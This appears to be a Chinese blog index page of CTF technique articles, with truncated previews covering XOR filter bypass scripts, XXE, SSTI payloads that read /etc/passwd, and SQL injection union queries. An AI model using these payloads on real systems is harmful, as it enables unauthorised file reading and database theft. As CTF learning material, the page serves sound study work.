ctf技术
文章平均质量分 67
ctf中常见的的一些技术知识
C1yas0
这个作者很懒,什么都没留下…
展开
-
python异或查询脚本
当过被滤掉字母时,我们可以使用异或运算的方法来拼写字母我们可以利用脚本查看哪两个字符进行异或可以组成目标字符使用效果:key = input("Input key:")for i in range(0,127): for j in range(0,127): result=i^j if(chr(result) is key ): print('("'+chr(i)+'"^"'+chr(j)+'")=='+chr(result)+'原创 2021-07-18 15:07:31 · 987 阅读 · 0 评论 -
pyhon异或运算转换脚本
当过被滤掉字母时,我们可以使用异或运算的方法来拼写字母var_dump('#'^'|'); //得到字符 _var_dump('.'^'~'); //得到字符 P var_dump('/'^'`'); //得到字符 0 var_dump('|'^'/'); //得到字符 S var_dump('{'^'/'); //得到字符 T $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); //变量$__值为字符串'_PO原创 2021-07-18 13:47:33 · 920 阅读 · 0 评论 -
XXE总结
一、XXE 是什么XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要被 XML 中其他的一些名字相似的东西扰乱了思维(盯好外部实体就行了),如果能注入 外部实体并且成功解析的话,这就会大大拓宽我们 XML 注入的攻击面(这可能就是为什么单独说 而没有原创 2021-07-16 17:45:39 · 684 阅读 · 1 评论 -
SSTI(模板注入)漏洞利用
读写文件读文件:方法一''.__class__.__mro__[2].__subclasses__()[166].__init__.__globals__['__builtins__']['file']('/etc/passwd').read()方法二:[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read()写文件换为 .write() 即可。写文件:方法一:''.__class__.__mro__[2].__su原创 2021-07-15 13:37:15 · 595 阅读 · 0 评论 -
SQL注入漏洞底层原理解析(注入点原理)
sql注入时一种常见的漏洞,大部分人只知道sql注入漏洞是由于sql语句过滤不够严谨所导致的,但是为什么过滤不严谨就会造成sql注入,对于这个问题,我们今天就来深挖一下sql注入产生的根本原因-----深入研究注入点。我再本地创建了两个表(命名和数据没有任何含义纯属瞎编的)Mysql版本5.1.60第一个表:news,可以理解为存储新闻信息的表,是理论上允许客户访问使用的数据库,里面并不存储敏感信息。第二个表:ps,用于账号管理的表,里面有管理员账号,有敏感信息。一、SELECT注入PS:在原创 2021-07-14 10:23:43 · 716 阅读 · 0 评论 -
sql注入小结
数字型注入可以用 id=2 与 id=3-1 返回的页面是否相同来判断是否是数字型联合注入?id=1' order by 1 --+?id=1' order by 2 --+?id=1' order by 3 --+……↑直至返回报错,可以判断出列数↑?id=1' union select database(),2,3 --+?id=1' union select 1,database(),3 --+?id=1' union select 1,2,database() --+↑哪个原创 2021-07-13 11:37:56 · 127 阅读 · 0 评论